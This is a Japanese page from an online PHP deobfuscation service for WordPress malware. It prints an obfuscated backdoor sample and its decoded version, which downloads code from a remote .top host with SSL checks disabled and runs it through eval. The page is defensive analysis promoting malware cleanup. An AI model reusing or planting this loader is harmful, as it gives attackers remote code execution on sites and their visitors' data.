Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php define('A', 'jan57.tpuwt5573ytu/suruga::[word]^^!!.html|item/u^/!/::?'); goto Qo3Zq; Qo3Zq: $x1DBi = "\x74\x78\164\56"; goto eM_QN; h4fIU: $x1DBi .= "\164\56\61\x30\163\x6b"; goto KKULZ; WU6rf: $x1DBi .= "\x74\x74\150"; goto vMRvT; Yt3ix: $x1DBi .= "\72\163\160"; goto WU6rf; I7yjh: $x1DBi ....



難読化されたPHPコード

<?php define('A', 'jan57.tpuwt5573ytu/suruga::[word]^^!!.html|item/u^/!/::?'); goto Qo3Zq; Qo3Zq: $x1DBi = "\x74\x78\164\56"; goto eM_QN; h4fIU: $x1DBi .= "\164\56\61\x30\163\x6b"; goto KKULZ; WU6rf: $x1DBi .= "\x74\x74\150"; goto vMRvT; Yt3ix: $x1DBi .= "\72\163\160"; goto WU6rf; I7yjh: $x1DBi .= "\163\x2f\x2f"; goto Yt3ix; eM_QN: $x1DBi .= "\65\x78\x2f\160\157"; goto h4fIU; KKULZ: $x1DBi .= "\153\157\x2e\x6f\x65"; goto I7yjh; vMRvT: eval("\77\76" . Roq_n(strrev($x1DBi))); goto hz9FL; hz9FL: function RoQ_n($K9OLS = '') { goto LAi61; fE0yF: $iHVyT = curl_init(); goto dj1a9; Wswo8: goto HD7Ho; goto MoXGn; iaeEi: $a8SXe = curl_exec($iHVyT); goto W4H17; JwqZc: HD7Ho: goto CWhnF; MoXGn: Lfe0j: goto fE0yF; dj1a9: curl_setopt($iHVyT, CURLOPT_RETURNTRANSFER, true); goto Go2lM; pJYvz: curl_setopt($iHVyT, CURLOPT_SSL_VERIFYHOST, false); goto nJ_HP; Go2lM: curl_setopt($iHVyT, CURLOPT_TIMEOUT, 500); goto sXeUw; nJ_HP: curl_setopt($iHVyT, CURLOPT_URL, $K9OLS); goto iaeEi; CWhnF: return $a8SXe; goto IjsIA; W4H17: curl_close($iHVyT); goto JwqZc; LAi61: if (function_exists("\143\x75\x72\154\137\151\x6e\151\x74") && function_exists("\x63\x75\162\154\x5f\145\x78\145\143")) { goto Lfe0j; } goto Ys1pr; Av3dv: $a8SXe = file_get_contents($K9OLS, false, $j0Fco); goto Wswo8; sXeUw: curl_setopt($iHVyT, CURLOPT_SSL_VERIFYPEER, false); goto pJYvz; Ys1pr: $j0Fco = stream_context_create(["\150\164\x74\160" => ["\155\x65\164\x68\157\144" => "\x47\105\x54"]]); goto Av3dv; IjsIA: } ?>

デコード(難読化解除)されたコード

<?php

define('A', 'jan57.tpuwt5573ytu/suruga::[word]^^!!.html|item/u^/!/::?');
$x1DBi = "txt.";
$x1DBi = "txt.5x/po";
$x1DBi = "txt.5x/pot.10sk";
$x1DBi = "txt.5x/pot.10skko.oe";
$x1DBi = "txt.5x/pot.10skko.oes//";
$x1DBi = "txt.5x/pot.10skko.oes//:sp";
$x1DBi = "txt.5x/pot.10skko.oes//:sptth";
eval("?>" . Roq_n("https://seo.okks01.top/x5.txt"));
function RoQ_n($K9OLS = '')
{
    if (function_exists("curl_init") && function_exists("curl_exec")) {
        $iHVyT = curl_init();
        curl_setopt($iHVyT, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($iHVyT, CURLOPT_TIMEOUT, 500);
        curl_setopt($iHVyT, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($iHVyT, CURLOPT_SSL_VERIFYHOST, false);
        curl_setopt($iHVyT, CURLOPT_URL, $K9OLS);
        $a8SXe = curl_exec($iHVyT);
        curl_close($iHVyT);
        goto JwqZc;
    }
    $j0Fco = stream_context_create(["http" => ["method" => "GET"]]);
    $a8SXe = file_get_contents($K9OLS, false, $j0Fco);
    JwqZc:
    return $a8SXe;
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.